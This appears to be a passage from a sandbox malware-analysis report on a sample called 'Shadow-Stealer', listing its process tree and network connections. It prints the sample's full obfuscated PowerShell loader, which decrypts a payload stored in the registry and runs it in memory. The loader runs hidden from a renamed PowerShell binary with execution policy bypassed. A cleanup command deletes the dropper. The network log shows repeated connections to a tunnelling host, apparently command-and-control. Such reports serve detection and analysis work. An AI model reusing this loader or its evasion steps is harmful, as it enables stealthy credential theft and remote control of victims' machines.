[Microsoft.Win32.Registry]::$BdNHQ.$UFhRe($UMIrZ).$MrvyW($PYyQA);$QJXfU=[string[]]$dINWW.Split('\');$flTmo=nnKof(VOHZF([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 
'')($QJXfU[1])));vzvJZ $flTmo (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$iBTnS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[0]);$xCaUG = New-Object System.Security.Cryptography.AesManaged;$xCaUG.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$CTnvz = $xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')();$iBTnS = $CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iBTnS, 0, $iBTnS.Length);$CTnvz.Dispose();$xCaUG.Dispose();$ABMbT = New-Object System.IO.MemoryStream(, $iBTnS);$FswzF = New-Object System.IO.MemoryStream;$ZWQus = New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::$UMIrZ1);$ZWQus.$NXCWg($FswzF);$ZWQus.Dispose();$ABMbT.Dispose();$FswzF.Dispose();$iBTnS = $FswzF.ToArray();$JJwWP = $tgmGC | IEX;$kXIpu = $JJwWP::$UMIrZ2($iBTnS);$OPPDg = $kXIpu.EntryPoint;$OPPDg.$UMIrZ0($null, (, [string[]] ($roofG)))

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{54e745f9-6d6a-425a-985d-828edb7c0146}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{f1103143-cf47-4231-9dff-93c0d4e2f17a}

C:\Windows\$sxr-powershell.exe

"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3264).WaitForExit();[System.Threading.Thread]::Sleep(5000); function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join 
'').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYBBv03aq6fIf9zugDa03cb0yO24aIfe5AFN+zOGDLKtWrsyyIVpjarzDCbBlxkhPRynAyHBM2A5pmzVa2gAc2+o8odD180Z07f5ZL3mYwTO8G4arHTtORWkqMdtdm7CA=');$tgmGC = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tgmGC, 0, $tgmGC.Length);$tgmGC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tgmGC);$zvkCv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JVVxi793TWK0eiazbMjyxQ==');$zvkCv = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zvkCv, 0, $zvkCv.Length);$zvkCv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($zvkCv);$MrvyW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('y9CiMcnIF08D1mbStDfFzg==');$MrvyW = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MrvyW, 0, $MrvyW.Length);$MrvyW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MrvyW);$UFhRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4Gkz3kktZWs5v4iY/fwpuA==');$UFhRe = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join 
'')($UFhRe, 0, $UFhRe.Length);$UFhRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UFhRe);$BdNHQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWujaRBJ7Bka6/SLPc2zjg==');$BdNHQ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BdNHQ, 0, $BdNHQ.Length);$BdNHQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BdNHQ);$NXCWg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JS1eCTl+J3Vy2lPum4BV+A==');$NXCWg = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NXCWg, 0, $NXCWg.Length);$NXCWg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NXCWg);$UMIrZ0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xun+s5YVAeQzgGPJKptAJw==');$UMIrZ0 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ0, 0, $UMIrZ0.Length);$UMIrZ0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ0);$UMIrZ1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tKxTd8rUmwwPDWYqtJ+flg==');$UMIrZ1 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ1, 0, $UMIrZ1.Length);$UMIrZ1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ1);$UMIrZ2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QwPWmxWc7oP0xMzohMzOyA==');$UMIrZ2 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ2, 0, $UMIrZ2.Length);$UMIrZ2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ2);$UMIrZ3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('00EoyZz50MzeF+YVDb5OyQ==');$UMIrZ3 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ3, 0, $UMIrZ3.Length);$UMIrZ3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ3);$qsFQP.Dispose();$xCaUG1.Dispose();if (@(get-process -ea silentlycontinue $UMIrZ3).count -gt 1) {exit};$dINWW = 
[Microsoft.Win32.Registry]::$BdNHQ.$UFhRe($UMIrZ).$MrvyW($PYyQA);$QJXfU=[string[]]$dINWW.Split('\');$flTmo=nnKof(VOHZF([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[1])));vzvJZ $flTmo (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$iBTnS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[0]);$xCaUG = New-Object System.Security.Cryptography.AesManaged;$xCaUG.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$CTnvz = $xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')();$iBTnS = $CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iBTnS, 0, $iBTnS.Length);$CTnvz.Dispose();$xCaUG.Dispose();$ABMbT = New-Object System.IO.MemoryStream(, $iBTnS);$FswzF = New-Object System.IO.MemoryStream;$ZWQus = New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::$UMIrZ1);$ZWQus.$NXCWg($FswzF);$ZWQus.Dispose();$ABMbT.Dispose();$FswzF.Dispose();$iBTnS = $FswzF.ToArray();$JJwWP = $tgmGC | IEX;$kXIpu = $JJwWP::$UMIrZ2($iBTnS);$OPPDg = $kXIpu.EntryPoint;$OPPDg.$UMIrZ0($null, (, [string[]] ($roofG)))

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{f4b702ba-50dc-40e9-96d8-424c3f8ee150}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{dea3282c-a49b-461e-9067-79a8adf6ecd7}

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{b65a5e11-da2a-4d2f-856d-f3dd32ba9ec3}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{a0f8c7f4-a97c-46d7-abd1-d678cb0569d5}

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{6826c128-6d66-4805-a13c-d36e731fa8f9}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{2f31e55d-e170-4e53-a6ad-b69adbda5ccd}

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{4f5aa893-b7cb-4f72-a561-1c5f695328e0}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{e0f8f228-ac5f-4064-abda-4046386f3608}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{2b748b6f-ecc5-4e4a-90c7-98aa7f08588b}

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{db0aa1dd-3628-47d4-b912-759bdfab246d}

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{44898605-52f5-4939-956e-cba3f54bfb22}

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{841db114-410f-478e-a5e5-b69122191b90}

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k WerSvcGroup

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 204 -p 6000 -ip 6000

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6000 -s 472

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{4fbe0289-c856-4047-805c-11689a33721b}

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 5520 -ip 5520

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5520 -s 476

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{6435be7b-5708-44a6-ba54-0b98bccdde1d}

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 416 -p 5836 -ip 5836

C:\Windows\SysWOW64\dllhost.exe

C:\Windows\SysWOW64\dllhost.exe /Processid:{4fd59ff4-8432-4b06-b013-7419c814bb98}

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 5836 -s 288

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe" & exit

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\PING.EXE

PING localhost -n 8

C:\Windows\system32\taskkill.exe

taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe"

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\system32\attrib.exe

ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe"

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc

C:\Windows\system32\BackgroundTransferHost.exe

"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

Network

Country Destination Domain Proto
US 8.8.8.8:53 throbbing-mountain-09011.pktriot.net udp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
US 52.111.229.48:443 tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:5050 throbbing-mountain-09011.pktriot.net tcp
DE 167.71.56.116:22112 throbbing-mountain-09011.pktriot.net tcp
